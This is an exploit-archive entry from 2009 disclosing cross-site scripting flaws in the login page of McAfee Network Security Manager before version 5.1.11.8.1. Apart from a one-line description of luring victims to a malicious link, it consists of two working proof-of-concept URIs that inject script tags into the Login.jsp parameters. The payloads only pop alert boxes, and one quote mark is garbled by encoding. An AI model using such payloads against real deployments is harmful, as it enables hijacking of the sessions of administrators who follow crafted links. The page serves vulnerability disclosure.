[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : McAfee Network Security Manager <5.1.11.8.1 Multiple Cross Site Scripting Vulnerabilities
# Published : 2009-11-12
# Author : Daniel King
# Previous Title : McAfee Network Security Manager <5.1.11.8.1 Information Disclosure Vulnerability
# Next Title : WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
The following example URIs are available:
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(a??XSSa??)</script>8b3283a1e57